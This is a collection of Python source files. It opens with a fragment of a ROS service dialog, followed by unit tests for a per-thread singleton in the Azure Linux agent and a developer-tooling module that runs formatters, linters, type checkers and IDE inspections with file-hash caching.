result[slot] = {':value': subresult, ':type': msg_type}
else:
subresult = cls._params_from_slots(list_msg_class.__slots__, list_msg_class._slot_types, values[slot] if slot in values and values[slot] else {})
if is_array:
result[slot] = {':value': subresult, ':type': msg_type}
else:
subresult[':type'] = msg_type
result[slot] = subresult
except ValueError as e:
print(traceback.format_exc())
rospy.logwarn("Error while parsing message type '%s': %s", utf8(msg_type), utf8(e))
return result
def _handle_resp(self, req, resp):
self.setWindowTitle(''.join(['Request / Response of ', self.service.name]))
self.setText('\n'.join([utf8(req), '---', utf8(resp)]))
|
test_singletonperthread.py
|
import uuid
from multiprocessing import Queue
from threading import Thread, currentThread
from azurelinuxagent.common.singletonperthread import SingletonPerThread
from tests.tools import AgentTestCase, clear_singleton_instances
class TestClassToTestSingletonPerThread(SingletonPerThread):
"""
Since these tests deal with testing in a multithreaded environment,
we employ the use of multiprocessing.Queue() to ensure that the data is consistent.
This test class uses a uuid to identify an object instead of directly using the object reference because
Queue.get() returns a different object reference than what was put in, even though the object is the same
(which is verified using uuid in this test class)
Eg:
obj1 = WireClient("obj1")
obj1
<__main__.WireClient object at 0x7f5e78476198>
q = Queue()
q.put(obj1)
test1 = q.get()
test1
<__main__.WireClient object at 0x7f5e78430630>
test1.endpoint == obj1.endpoint
True
"""
def __init__(self):
# Set the name of the object to the current thread name
self.name = currentThread().getName()
# Unique identifier for a class object
self.uuid = str(uuid.uuid4())
class TestSingletonPerThread(AgentTestCase):
THREAD_NAME_1 = 'thread-1'
THREAD_NAME_2 = 'thread-2'
def setUp(self):
super(TestSingletonPerThread, self).setUp()
# In a multi-threaded environment, exceptions thrown in the child thread will not be propagated to the parent
# thread. To surface them, all exceptions are added to a Queue and then checked in the parent thread.
self.errors = Queue()
clear_singleton_instances(TestClassToTestSingletonPerThread)
def _setup_multithread_and_execute(self, func1, args1, func2, args2, t1_name=None, t2_name=None):
t1 = Thread(target=func1, args=args1)
t2 = Thread(target=func2, args=args2)
t1.setName(t1_name if t1_name else self.THREAD_NAME_1)
t2.setName(t2_name if t2_name else self.THREAD_NAME_2)
t1.start()
t2.start()
t1.join()
t2.join()
errs = []
while not self.errors.empty():
errs.append(self.errors.get())
if len(errs) > 0:
raise Exception("Errors: %s" % ' , '.join(errs))
@staticmethod
def _get_test_class_instance(q, err):
try:
obj = TestClassToTestSingletonPerThread()
q.put(obj)
except Exception as e:
err.put(str(e))
def _parse_instances_and_return_thread_objects(self, instances, t1_name=None, t2_name=None):
obj1, obj2 = instances.get(), instances.get()
def check_obj(name):
if obj1.name == name:
return obj1
elif obj2.name == name:
return obj2
else:
return None
t1_object = check_obj(t1_name if t1_name else self.THREAD_NAME_1)
t2_object = check_obj(t2_name if t2_name else self.THREAD_NAME_2)
return t1_object, t2_object
def test_it_should_have_only_one_instance_for_same_thread(self):
obj1 = TestClassToTestSingletonPerThread()
obj2 = TestClassToTestSingletonPerThread()
self.assertEqual(obj1.uuid, obj2.uuid)
def test_it_should_have_multiple_instances_for_multiple_threads(self):
instances = Queue()
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors))
self.assertEqual(2, instances.qsize()) # Assert that there are 2 objects in the queue
obj1, obj2 = instances.get(), instances.get()
self.assertNotEqual(obj1.uuid, obj2.uuid)
def test_it_should_return_existing_instance_for_new_thread_with_same_name(self):
instances = Queue()
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors))
t1_obj, t2_obj = self._parse_instances_and_return_thread_objects(instances)
new_instances = Queue()
# The 2nd call is to get new objects with the same thread name to verify that the objects are the same
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(new_instances, self.errors),
func2=self._get_test_class_instance,
args2=(new_instances, self.errors))
new_t1_obj, new_t2_obj = self._parse_instances_and_return_thread_objects(new_instances)
self.assertEqual(t1_obj.name, new_t1_obj.name)
self.assertEqual(t1_obj.uuid, new_t1_obj.uuid)
self.assertEqual(t2_obj.name, new_t2_obj.name)
self.assertEqual(t2_obj.uuid, new_t2_obj.uuid)
def test_singleton_object_should_match_thread_name(self):
instances = Queue()
t1_name = str(uuid.uuid4())
t2_name = str(uuid.uuid4())
test_class_obj_name = lambda t_name: "%s__%s" % (TestClassToTestSingletonPerThread.__name__, t_name)
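# SingletonPerThread appears to key instances as '<ClassName>__<thread name>',
# e.g. 'TestClassToTestSingletonPerThread__thread-1'; the lambda above rebuilds
# that key for the assertions below.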
self._setup_multithread_and_execute(func1=self._get_test_class_instance,
args1=(instances, self.errors),
func2=self._get_test_class_instance,
args2=(instances, self.errors),
t1_name=t1_name,
t2_name=t2_name)
singleton_instances = TestClassToTestSingletonPerThread._instances # pylint: disable=no-member
# Assert instance names are consistent with the thread names
self.assertIn(test_class_obj_name(t1_name), singleton_instances)
self.assertIn(test_class_obj_name(t2_name), singleton_instances)
# Assert that the objects match their respective threads
# This function matches objects with their thread names and returns the respective object or None if not found
t1_obj, t2_obj = self._parse_instances_and_return_thread_objects(instances, t1_name, t2_name)
# Ensure that objects for both the threads were found
self.assertIsNotNone(t1_obj)
self.assertIsNotNone(t2_obj)
# Ensure that the objects match with their respective thread objects
self.assertEqual(singleton_instances[test_class_obj_name(t1_name)].uuid, t1_obj.uuid)
self.assertEqual(singleton_instances[test_class_obj_name(t2_name)].uuid, t2_obj.uuid)
|
code.py
|
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""Functionality for formatting, linting, etc. code."""
from __future__ import annotations
import os
import subprocess
import sys
from pathlib import Path
from typing import TYPE_CHECKING
from efrotools.filecache import FileCache
if TYPE_CHECKING:
from typing import Set, List, Dict, Any, Union, Optional
def formatcode(projroot: Path, full: bool) -> None:
"""Run clang-format on all of our source code (multithreaded)."""
import time
import concurrent.futures
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
cachepath = Path(projroot, 'config/.cache-formatcode')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
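# FileCache workflow (as used here): update() refreshes the per-file hash
# entries against the current config hash, get_dirty_files() returns the files
# whose hash (or the config) changed, and mark_clean()/write() persist the new
# state once formatting succeeded.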
cfconfig = Path(projroot, '.clang-format')
filenames = get_code_filenames(projroot)
confighash = get_files_hash([cfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> Dict[str, Any]:
start_time = time.time()
# Note: seems os.system does not unlock the gil;
# make sure to use subprocess.
result = subprocess.call(['clang-format', '-i', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
return {'f': filename, 't': duration}
with concurrent.futures.ThreadPoolExecutor(
max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} code files.',
flush=True)
def cpplint(projroot: Path, full: bool) -> None:
"""Run lint-checking on all code deemed lint-able."""
# pylint: disable=too-many-locals
import tempfile
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import getconfig
from efro.terminal import Clr
from efro.error import CleanError
os.chdir(projroot)
filenames = get_code_filenames(projroot)
for fpath in filenames:
if ' ' in fpath:
raise Exception(f'Found space in path {fpath}; unexpected.')
# Check the config for a list of ones to ignore.
code_blacklist: List[str] = getconfig(projroot).get(
'cpplint_blacklist', [])
# Just pretend blacklisted ones don't exist.
filenames = [f for f in filenames if f not in code_blacklist]
filenames = [f for f in filenames if not f.endswith('.mm')]
cachepath = Path(projroot, 'config/.cache-lintcode')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, '')
dirtyfiles = cache.get_dirty_files()
if dirtyfiles:
print(f'{Clr.BLU}CppLint checking'
f' {len(dirtyfiles)} file(s)...{Clr.RST}')
# We want to do a few custom modifications to the cpplint module...
try:
import cpplint as cpplintmodule
except Exception:
raise CleanError('Unable to import cpplint')
with open(cpplintmodule.__file__) as infile:
codelines = infile.read().splitlines()
cheadersline = codelines.index('_C_HEADERS = frozenset([')
# Extra headers we consider as valid C system headers.
c_headers = [
'malloc.h', 'tchar.h', 'jni.h', 'android/log.h', 'EGL/egl.h',
'libgen.h', 'linux/netlink.h', 'linux/rtnetlink.h', 'android/bitmap.h',
'android/log.h', 'uuid/uuid.h', 'cxxabi.h', 'direct.h', 'shellapi.h',
'rpc.h', 'io.h'
]
codelines.insert(cheadersline + 1, ''.join(f"'{h}'," for h in c_headers))
# Skip unapproved C++ headers check (it flags <mutex>, <thread>, etc.)
headercheckline = codelines.index(
" if include and include.group(1) in ('cfenv',")
codelines[headercheckline] = (
" if False and include and include.group(1) in ('cfenv',")
# Don't complain about unknown NOLINT categories.
# (we use them for clang-tidy)
unknownlintline = codelines.index(
' elif category not in _LEGACY_ERROR_CATEGORIES:')
codelines[unknownlintline] = ' elif False:'
def lint_file(filename: str) -> None:
result = subprocess.call(
['python3.7', '-m', 'cpplint', '--root=src', filename], env=env)
if result != 0:
raise CleanError(
f'{Clr.RED}Cpplint failed for {filename}.{Clr.RST}')
with tempfile.TemporaryDirectory() as tmpdir:
# Write our replacement module, make it discoverable, then run.
with open(tmpdir + '/cpplint.py', 'w') as outfile:
outfile.write('\n'.join(codelines))
env = os.environ.copy()
env['PYTHONPATH'] = tmpdir
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(lint_file, dirtyfiles))
if dirtyfiles:
cache.mark_clean(filenames)
cache.write()
print(
f'{Clr.GRN}CppLint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
def get_code_filenames(projroot: Path) -> List[str]:
"""Return the list of files to lint-check or auto-formatting."""
from efrotools import getconfig
exts = ('.h', '.c', '.cc', '.cpp', '.cxx', '.m', '.mm')
places = getconfig(projroot).get('code_source_dirs', None)
if places is None:
raise RuntimeError('code_source_dirs not declared in config')
codefilenames = []
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
if any(fname.endswith(ext) for ext in exts):
codefilenames.append(os.path.join(root, fname))
codefilenames.sort()
return codefilenames
def formatscripts(projroot: Path, full: bool) -> None:
"""Runs yapf on all our scripts (multithreaded)."""
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
cachepath = Path(projroot, 'config/.cache-formatscripts')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
yapfconfig = Path(projroot, '.style.yapf')
filenames = get_script_filenames(projroot)
confighash = get_files_hash([yapfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> None:
start_time = time.time()
result = subprocess.call(
['python3.7', '-m', 'yapf', '--in-place', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Convert the futures to a list to propagate any errors even
# though there are no return values we use.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} script files.',
flush=True)
def _should_include_script(fnamefull: str) -> bool:
fname = os.path.basename(fnamefull)
if fname.endswith('.py'):
return True
# Look for 'binary' scripts with no extensions too.
if not fname.startswith('.') and '.' not in fname:
try:
with open(fnamefull) as infile:
line = infile.readline()
if '/usr/bin/env python' in line or '/usr/bin/python' in line:
return True
except UnicodeDecodeError:
# Actual binary files will probably kick back this error.
pass
return False
def get_script_filenames(projroot: Path) -> List[str]:
"""Return the Python filenames to lint-check or auto-format."""
from efrotools import getconfig
filenames = set()
places = getconfig(projroot).get('python_source_dirs', None)
if places is None:
raise RuntimeError('python_source_dirs not declared in config')
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
fnamefull = os.path.join(root, fname)
# Skip symlinks (we conceivably operate on the original too)
if os.path.islink(fnamefull):
continue
if _should_include_script(fnamefull):
filenames.add(fnamefull)
return sorted(f for f in filenames if 'flycheck_' not in f)
def runpylint(projroot: Path, filenames: List[str]) -> None:
"""Run Pylint explicitly on files."""
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
# Technically we could just run pylint standalone via command line here,
# but let's go ahead and run it inline so we're consistent with our cached
# full-project version.
_run_pylint(projroot,
pylintrc,
cache=None,
dirtyfiles=filenames,
allfiles=None)
def pylint(projroot: Path, full: bool, fast: bool) -> None:
"""Run Pylint on all scripts in our project (with smart dep tracking)."""
from efrotools import get_files_hash
from efro.terminal import Clr
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
filenames = get_script_filenames(projroot)
if any(' ' in name for name in filenames):
raise Exception('found space in path; unexpected')
script_blacklist: List[str] = []
filenames = [f for f in filenames if f not in script_blacklist]
cachebasename = '.cache-lintscriptsfast' if fast else '.cache-lintscripts'
cachepath = Path(projroot, 'config', cachebasename)
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, get_files_hash([pylintrc]))
# Do a recursive dependency check and mark all files who are
# either dirty or have a dependency that is dirty.
filestates: Dict[str, bool] = {}
for fname in filenames:
_dirty_dep_check(fname, filestates, cache, fast, 0)
dirtyfiles = [k for k, v in filestates.items() if v]
# Let's sort by modification time, so ones we're actively trying
# to fix get linted first and we see remaining errors faster.
dirtyfiles.sort(reverse=True, key=lambda f: os.stat(f).st_mtime)
if dirtyfiles:
print(
f'{Clr.BLU}Pylint checking {len(dirtyfiles)} file(s)...{Clr.RST}',
flush=True)
try:
_run_pylint(projroot, pylintrc, cache, dirtyfiles, filenames)
finally:
# No matter what happens, we still want to
# update our disk cache (since some lints may have passed).
cache.write()
print(f'{Clr.GRN}Pylint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
cache.write()
def _dirty_dep_check(fname: str, filestates: Dict[str, bool], cache: FileCache,
fast: bool, recursion: int) -> bool:
"""Recursively check a file's deps and return whether it is dirty."""
# pylint: disable=too-many-branches
if not fast:
# Check for existing dirty state (only applies in non-fast where
# we recurse infinitely).
curstate = filestates.get(fname)
if curstate is not None:
return curstate
# Ok; there's no current state for this file.
# First let's immediately mark it as clean so if a dependency of ours
# queries it we won't loop infinitely. (If we're actually dirty that
# will be reflected properly once we're done).
if not fast:
filestates[fname] = False
# If this dependency has disappeared, consider that dirty.
if fname not in cache.entries:
dirty = True
else:
cacheentry = cache.entries[fname]
# See if we ourself are dirty
if 'hash' not in cacheentry:
dirty = True
else:
# Ok we're clean; now check our dependencies..
dirty = False
# Only increment recursion in fast mode, and
# skip dependencies if we're past the recursion limit.
recursion2 = recursion
if fast:
# Our one exception is top level ba which basically aggregates.
if not fname.endswith('/ba/__init__.py'):
recursion2 += 1
if recursion2 <= 1:
deps = cacheentry.get('deps', [])
for dep in deps:
# If we have a dep that no longer exists, WE are dirty.
if not os.path.exists(dep):
dirty = True
break
if _dirty_dep_check(dep, filestates, cache, fast,
recursion2):
dirty = True
break
# Cache and return our dirty state..
# Note: for fast mode we limit to recursion==0 so we only write when
# the file itself is being directly visited.
if recursion == 0:
filestates[fname] = dirty
return dirty
def _run_pylint(projroot: Path, pylintrc: Union[Path, str],
cache: Optional[FileCache], dirtyfiles: List[str],
allfiles: Optional[List[str]]) -> Dict[str, Any]:
import time
from pylint import lint
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
args = ['--rcfile', str(pylintrc), '--output-format=colorized']
args += dirtyfiles
name = f'{len(dirtyfiles)} file(s)'
run = lint.Run(args, do_exit=False)
if cache is not None:
assert allfiles is not None
result = _apply_pylint_run_to_cache(projroot, run, dirtyfiles,
allfiles, cache)
if result != 0:
raise CleanError(f'Pylint failed for {result} file(s).')
# Sanity check: when the linter fails we should always be failing too.
# If not, it means we're probably missing something and incorrectly
# marking a failed file as clean.
if run.linter.msg_status != 0 and result == 0:
raise RuntimeError('Pylint linter returned non-zero result'
' but we did not; this is probably a bug.')
else:
if run.linter.msg_status != 0:
raise CleanError('Pylint failed.')
duration = time.time() - start_time
print(f'{Clr.GRN}Pylint passed for {name}'
f' in {duration:.1f} seconds.{Clr.RST}')
sys.stdout.flush()
return {'f': dirtyfiles, 't': duration}
def _apply_pylint_run_to_cache(projroot: Path, run: Any, dirtyfiles: List[str],
allfiles: List[str], cache: FileCache) -> int:
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
from astroid import modutils
from efrotools import getconfig
from efro.error import CleanError
# First off, build a map of dirtyfiles to module names
# (and the corresponding reverse map).
paths_to_names: Dict[str, str] = {}
names_to_paths: Dict[str, str] = {}
for fname in allfiles:
try:
mpath = modutils.modpath_from_file(fname)
mpath = _filter_module_name('.'.join(mpath))
paths_to_names[fname] = mpath
except ImportError:
            # This probably means it's a tool or something not in our
            # standard path. In this case just use its base name.
            # (This seems to be what pylint does.)
dummyname = os.path.splitext(os.path.basename(fname))[0]
paths_to_names[fname] = dummyname
for key, val in paths_to_names.items():
names_to_paths[val] = key
    # If there are any cyclic-import errors, just mark all deps as dirty;
    # we don't want to add the logic to figure out which files the cycles
    # cover, since they all seem to appear as errors for the last file in
    # the list.
cycles: int = run.linter.stats.get('by_msg', {}).get('cyclic-import', 0)
have_dep_cycles: bool = cycles > 0
if have_dep_cycles:
print(f'Found {cycles} cycle-errors; keeping all dirty files dirty.')
# Update dependencies for what we just ran.
# A run leaves us with a map of modules to a list of the modules that
    # import them. We want the opposite though: for each of our modules
# we want a list of the modules it imports.
reversedeps = {}
# Make sure these are all proper module names; no foo.bar.__init__ stuff.
for key, val in run.linter.stats['dependencies'].items():
sval = [_filter_module_name(m) for m in val]
reversedeps[_filter_module_name(key)] = sval
deps: Dict[str, Set[str]] = {}
untracked_deps = set()
for mname, mallimportedby in reversedeps.items():
for mimportedby in mallimportedby:
if mname in names_to_paths:
deps.setdefault(mimportedby, set()).add(mname)
else:
untracked_deps.add(mname)
ignored_untracked_deps: List[str] = getconfig(projroot).get(
'pylint_ignored_untracked_deps', [])
# Add a few that this package itself triggers.
ignored_untracked_deps += ['pylint.lint', 'astroid.modutils', 'astroid']
# Ignore some specific untracked deps; complain about any others.
untracked_deps = set(dep for dep in untracked_deps
if dep not in ignored_untracked_deps)
if untracked_deps:
raise CleanError(
f'Pylint found untracked dependencies: {untracked_deps}.'
' If these are external to your project, add them to'
' "pylint_ignored_untracked_deps" in the project config.')
    # Finally add the dependency lists to our entries (operate on
    # everything in the run, even files that don't show up in deps).
no_deps_modules = set()
for fname in dirtyfiles:
fmod = paths_to_names[fname]
if fmod not in deps:
            # Since this code is a bit flaky, let's always announce when we
            # come up empty and keep a whitelist of expected values to ignore.
no_deps_modules.add(fmod)
depsval: List[str] = []
else:
# Our deps here are module names; store paths.
depsval = [names_to_paths[dep] for dep in deps[fmod]]
cache.entries[fname]['deps'] = depsval
# Let's print a list of modules with no detected deps so we can make sure
# this is behaving.
if no_deps_modules:
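        # (This print is intentionally disabled; it's written as bool(False)
        # rather than a bare False, presumably to avoid linter warnings about
        # constant conditions. Flip it on when debugging dep detection.)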
if bool(False):
print('NOTE: no dependencies found for:',
', '.join(no_deps_modules))
# Ok, now go through all dirtyfiles involved in this run.
# Mark them as either errored or clean depending on whether there's
# error info for them in the run stats.
# Once again need to convert any foo.bar.__init__ to foo.bar.
stats_by_module: Dict[str, Any] = {
_filter_module_name(key): val
for key, val in run.linter.stats['by_module'].items()
}
errcount = 0
for fname in dirtyfiles:
mname2 = paths_to_names.get(fname)
if mname2 is None:
            raise Exception(f'unable to get module name for "{fname}"')
counts = stats_by_module.get(mname2)
# 'statement' count seems to be new and always non-zero; ignore it
if counts is not None:
counts = {c: v for c, v in counts.items() if c != 'statement'}
if (counts is not None and any(counts.values())) or have_dep_cycles:
# print('GOT FAIL FOR', fname, counts)
if 'hash' in cache.entries[fname]:
del cache.entries[fname]['hash']
errcount += 1
else:
# print('MARKING FILE CLEAN', mname2, fname)
            cache.entries[fname]['hash'] = cache.curhashes[fname]
return errcount
def _filter_module_name(mpath: str) -> str:
"""Filter weird module paths such as 'foo.bar.__init__' to 'foo.bar'."""
# Seems Pylint returns module paths with __init__ on the end in some cases
# and not in others. Could dig into it, but for now just filtering them
# out...
return mpath[:-9] if mpath.endswith('.__init__') else mpath
def runmypy(projroot: Path,
filenames: List[str],
full: bool = False,
check: bool = True) -> None:
"""Run MyPy on provided filenames."""
from efrotools import PYTHON_BIN
args = [
PYTHON_BIN, '-m', 'mypy', '--pretty', '--no-error-summary',
'--config-file',
str(Path(projroot, '.mypy.ini'))
] + filenames
if full:
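        # Slip --no-incremental in right after the 'mypy' module name so it
        # is passed as a mypy option, ahead of the config and file args.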
args.insert(args.index('mypy') + 1, '--no-incremental')
subprocess.run(args, check=check)
def mypy(projroot: Path, full: bool) -> None:
"""Type check all of our scripts using mypy."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
desc = '(full)' if full else '(incremental)'
print(f'{Clr.BLU}Running Mypy {desc}...{Clr.RST}', flush=True)
starttime = time.time()
try:
runmypy(projroot, filenames, full)
    except Exception as exc:
        raise CleanError('Mypy failed.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def dmypy(projroot: Path) -> None:
"""Type check all of our scripts using mypy in daemon mode."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
# Special case; explicitly kill the daemon.
if '-stop' in sys.argv:
subprocess.run(['dmypy', 'stop'], check=False)
return
print('Running Mypy (daemon)...', flush=True)
starttime = time.time()
try:
args = [
'dmypy', 'run', '--timeout', '3600', '--', '--config-file',
'.mypy.ini', '--follow-imports=error', '--pretty'
] + filenames
subprocess.run(args, check=True)
    except Exception as exc:
        raise CleanError('Mypy daemon failed.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy daemon passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _parse_idea_results(path: Path) -> int:
"""Print errors found in an idea inspection xml file.
Returns the number of errors found.
"""
import xml.etree.ElementTree as Et
error_count = 0
root = Et.parse(str(path)).getroot()
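    # Each <problem> element in the inspection output carries <file>,
    # <line>, <description> and <problem_class> children; pull those out
    # and report them below.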
for child in root:
line: Optional[str] = None
description: Optional[str] = None
fname: Optional[str] = None
if child.tag == 'problem':
is_error = True
for pchild in child:
if pchild.tag == 'problem_class':
# We still report typos but we don't fail the
# check due to them (that just gets tedious).
if pchild.text == 'Typo':
is_error = False
if pchild.tag == 'line':
line = pchild.text
if pchild.tag == 'description':
description = pchild.text
if pchild.tag == 'file':
fname = pchild.text
if isinstance(fname, str):
fname = fname.replace('file://$PROJECT_DIR$/', '')
print(f'{fname}:{line}: {description}')
if is_error:
error_count += 1
return error_count
def _run_idea_inspections(projroot: Path,
scripts: List[str],
displayname: str,
inspect: Path,
verbose: bool,
                          inspectdir: Optional[Path] = None) -> None:
"""Actually run idea inspections.
Throw an Exception if anything is found or goes wrong.
"""
# pylint: disable=too-many-locals
import tempfile
import time
import datetime
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
print(
f'{Clr.BLU}{displayname} checking'
f' {len(scripts)} file(s)...{Clr.RST}',
flush=True)
tmpdir = tempfile.TemporaryDirectory()
iprof = Path(projroot, '.idea/inspectionProfiles/Default.xml')
if not iprof.exists():
iprof = Path(projroot, '.idea/inspectionProfiles/Project_Default.xml')
if not iprof.exists():
raise Exception('No default inspection profile found.')
cmd = [str(inspect), str(projroot), str(iprof), tmpdir.name, '-v2']
if inspectdir is not None:
cmd += ['-d', str(inspectdir)]
running = True
def heartbeat() -> None:
"""Print the time occasionally to make the log more informative."""
while running:
time.sleep(60)
print('Heartbeat', datetime.datetime.now(), flush=True)
if verbose:
import threading
print(cmd, flush=True)
threading.Thread(target=heartbeat, daemon=True).start()
result = subprocess.run(cmd, capture_output=not verbose, check=False)
running = False
if result.returncode != 0:
# In verbose mode this stuff got printed already.
if not verbose:
stdout = (
result.stdout.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
            stderr = (
                result.stderr.decode() if isinstance(  # type: ignore
                    result.stderr, bytes) else str(result.stderr))
print(f'{displayname} inspection failure stdout:\n{stdout}' +
f'{displayname} inspection failure stderr:\n{stderr}')
raise RuntimeError(f'{displayname} inspection failed.')
files = [f for f in os.listdir(tmpdir.name) if not f.startswith('.')]
total_errors = 0
if files:
for fname in files:
total_errors += _parse_idea_results(Path(tmpdir.name, fname))
if total_errors > 0:
raise CleanError(f'{Clr.SRED}{displayname} inspection'
f' found {total_errors} error(s).{Clr.RST}')
duration = time.time() - start_time
print(
f'{Clr.GRN}{displayname} passed for {len(scripts)} files'
f' in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _run_idea_inspections_cached(cachepath: Path,
filenames: List[str],
full: bool,
projroot: Path,
displayname: str,
inspect: Path,
verbose: bool,
                                 inspectdir: Optional[Path] = None) -> None:
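    """Run IDEA inspections, but only when relevant files have changed.

    A single hash of all script contents (plus a few .idea config files)
    is stored at cachepath; if it matches the previous run and 'full' is
    not set, the (slow) inspection step is skipped entirely.
    """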
# pylint: disable=too-many-locals
import hashlib
import json
from efro.terminal import Clr
md5 = hashlib.md5()
# Let's calc a single hash from the contents of all script files and only
# run checks when that changes. Sadly there's not much else optimization
# wise that we can easily do, but this will at least prevent re-checks when
# nothing at all has changed.
for filename in filenames:
with open(filename, 'rb') as infile:
md5.update(infile.read())
# Also hash a few .idea files so we re-run inspections when they change.
extra_hash_paths = [
Path(projroot, '.idea/inspectionProfiles/Default.xml'),
Path(projroot, '.idea/inspectionProfiles/Project_Default.xml'),
Path(projroot, '.idea/dictionaries/ericf.xml')
]
for epath in extra_hash_paths:
if os.path.exists(epath):
with open(epath, 'rb') as infile:
md5.update(infile.read())
current_hash = md5.hexdigest()
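    # The cache file itself is just a tiny json dict of the form
    # {'hash': <hexdigest>}, written out below after a successful run.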
existing_hash: Optional[str]
try:
with open(cachepath) as infile2:
existing_hash = json.loads(infile2.read())['hash']
except Exception:
existing_hash = None
if full or current_hash != existing_hash:
_run_idea_inspections(projroot,
filenames,
displayname,
inspect=inspect,
verbose=verbose,
inspectdir=inspectdir)
with open(cachepath, 'w') as outfile:
outfile.write(json.dumps({'hash': current_hash}))
print(
f'{Clr.GRN}{displayname}: all {len(filenames)}'
f' files are passing.{Clr.RST}',
flush=True)
def pycharm(projroot: Path, full: bool, verbose: bool) -> None:
"""Run pycharm inspections on all our scripts."""
import time
# FIXME: Generalize this to work with at least linux, possibly windows.
cachepath = Path('config/.cache-pycharm')
filenames = get_script_filenames(projroot)
pycharmroot = Path('/Applications/PyCharm CE.app')
pycharmbin = Path(pycharmroot, 'Contents/MacOS/pycharm')
inspect = Path(pycharmroot, 'Contents/bin/inspect.sh')
# In full mode, clear out pycharm's caches first.
# It seems we need to spin up the GUI and give it a bit to
# re-cache system python for this to work...
# UPDATE: This really slows things down, so we now only do it in
# very specific cases where time isn't important.
# (such as our daily full-test-runs)
if full and os.environ.get('EFROTOOLS_FULL_PYCHARM_RECACHE') == '1':
print('Clearing PyCharm caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/PyCharmCE*',
shell=True,
check=True)
print('Launching GUI PyCharm to rebuild caches...', flush=True)
process = subprocess.Popen(str(pycharmbin))
# Wait a bit and ask it nicely to die.
# We need to make sure it has enough time to do its cache updating
# thing even if the system is fully under load.
time.sleep(10 * 60)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run(
"osascript -e 'tell application \"PyCharm CE\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI PyCharm to quit...', flush=True)
process.wait()
_run_idea_inspections_cached(cachepath=cachepath,
filenames=filenames,
full=full,
projroot=projroot,
displayname='PyCharm',
inspect=inspect,
verbose=verbose)
def clioncode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run clion inspections on all our code."""
import time
cachepath = Path('config/.cache-clioncode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/CLion.app')
clionbin = Path(clionroot, 'Contents/MacOS/clion')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
